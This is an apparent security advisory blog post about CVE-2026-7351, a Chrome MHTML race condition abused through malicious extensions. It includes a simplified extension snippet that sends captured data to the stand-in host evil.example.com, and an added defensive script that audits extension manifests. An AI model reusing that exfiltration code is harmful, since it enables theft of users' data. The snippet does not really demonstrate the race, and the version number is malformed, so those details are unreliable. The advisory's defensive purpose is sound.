Summary:
A newly disclosed vulnerability, CVE-2026-7351, highlights a race condition in MHTML handling in Google Chrome prior to version 147..7727.138. This flaw allows attackers—armed with a carefully crafted malicious Chrome Extension—to leak cross-origin data. The issue is tagged as high severity by the Chromium team because it enables stealthy and powerful data theft on affected systems.

What is MHTML in Chrome?

MHTML stands for MIME HTML, a web page archive format that packages HTML code, images, and other resources into a single file. Chrome uses this for saving and displaying complete web pages. MHTML parsing is complex, especially when you’re dealing with multiple resources, boundaries, and origins.

The Vulnerability: A Race to Leak Your Data

At its heart, CVE-2026-7351 is a race condition. That means Chrome’s processes could get out of sync while handling MHTML, especially when loading resources. A tricky attacker creates a scenario in which Chrome’s resource loading code reads sensitive data from another website, then leaks it to the attacker’s extension.

Attackers can only pull this off if they lure the victim into installing their malicious Chrome Extension. Once installed, the extension does the rest.

How Does It Work? (Deep Dive)

1. Victim Installs Malicious Extension: The attacker convinces the user through email, pop-up, or a fake website.
2. Extension Crafts MHTML Content: The extension triggers Chrome to load a crafted MHTML file (locally or remotely).
3. Race Condition Triggers: While Chrome fetches cross-origin resources, a timing bug lets the extension grab the data before security boundaries are enforced.
4. Sensitive Data Leaks: The extension siphons off cookies, tokens, or private messages from other sites.

Example Code: How an Extension Might Exploit CVE-2026-7351

Here’s a simplified version showing how a suspicious extension might read content as soon as an MHTML file is loaded:

// background.js in the malicious extension

chrome.tabs.create({ url: 'mhtml://file.mhtml' }, function(tab) {
    // Listener for webRequest to catch leaking data
    chrome.webRequest.onCompleted.addListener(function(details) {
        if (details.url.includes('sensitive-data')) {
            fetch(details.url)
              .then(response => response.text())
              .then(data => {
                  // exfiltrate to attacker's server
                  fetch('https://evil.example.com/log', {
                      method: 'POST',
                      body: JSON.stringify({ leak: data })
                  });
              });
        }
    }, { urls: ['<all_urls>'] });
});

Note: The real exploit would have to work around some modern Chrome protections, but the essence is that the extension can use privileged APIs and the Chrome MHTML handler’s flaws to fetch cross-origin content.

Check Permissions:

Extensions that want to "read data on all websites" are risky, especially if you don’t trust the developer.
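
A defensive check for the point above, as an added example that is not part of the original article: a Node.js audit of extension manifests that flags all-site host access combined with the APIs seen in the sample (tabs, webRequest) or with MHTML capture (pageCapture). The function name, risk labels and sample manifests are constructed for illustration.

```javascript
// Added example: audit extension manifests for the broad access the page warns about.
// auditManifest, the risk labels and the sample manifests are assumptions made for this example.

// Match patterns that grant access to every site.
const BROAD_HOSTS = new Set(['<all_urls>', '*://*/*', 'http://*/*', 'https://*/*', 'file:///*']);
// API permissions relevant to this page: request observation, tab control, MHTML capture.
const SENSITIVE_APIS = new Set(['webRequest', 'webRequestBlocking', 'tabs', 'pageCapture', 'debugger']);

function auditManifest(manifest) {
  const declared = [
    ...(manifest.permissions || []),            // MV2 mixes API names and host patterns here
    ...(manifest.host_permissions || []),       // MV3 host patterns
    ...(manifest.optional_permissions || []),
    ...(manifest.optional_host_permissions || []),
  ].filter((p) => typeof p === 'string');
  // Content scripts also grant page access, even without host permissions.
  const scriptMatches = (manifest.content_scripts || []).flatMap((cs) => cs.matches || []);

  const broadHosts = [...new Set([...declared, ...scriptMatches].filter((p) => BROAD_HOSTS.has(p)))];
  const sensitiveApis = [...new Set(declared.filter((p) => SENSITIVE_APIS.has(p)))];

  // All-site access plus a sensitive API is the combination used in the page's sample.
  let risk = 'low';
  if (broadHosts.length && sensitiveApis.length) risk = 'high';
  else if (broadHosts.length || sensitiveApis.length) risk = 'review';
  return { name: manifest.name || '(unnamed)', risk, broadHosts, sensitiveApis };
}

// Constructed sample manifests (not real extensions).
const SAMPLE_MANIFESTS = [
  { name: 'Page Saver', manifest_version: 3, permissions: ['tabs', 'webRequest', 'pageCapture'],
    host_permissions: ['<all_urls>'] },
  { name: 'Legacy Helper', manifest_version: 2, permissions: ['storage', '*://*/*'] },
  { name: 'Notes', manifest_version: 3, permissions: ['storage'],
    host_permissions: ['https://notes.example.com/*'] },
];

for (const m of SAMPLE_MANIFESTS) {
  const r = auditManifest(m);
  console.log(`${r.risk.padEnd(6)} ${r.name}: hosts=[${r.broadHosts}] apis=[${r.sensitiveApis}]`);
}
```

Point it at the parsed manifest.json of each installed extension; anything reported as high deserves a manual look at who publishes it.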

Exploit in the Wild?

As of now, there are no reports of public mass exploitation. But the patch is public, and it’s just a matter of time before attackers copy the exploit. Chrome’s auto-update should protect most users soon.

Conclusion

CVE-2026-7351 reminds us that even the world's most-used browser can fall victim to subtle race conditions. By exploiting complex document formats like MHTML, attackers can cross security lines—IF we’re not careful with what we install. Stay updated, be careful with extensions, and keep your browser locked down for best protection!


> Want to dig deeper? Track Chromium issues at chromium.org and keep an eye on CVE feeds for updates!

Timeline

Published on: 04/28/2026 22:35:59 UTC
Last modified on: 04/30/2026 16:40:22 UTC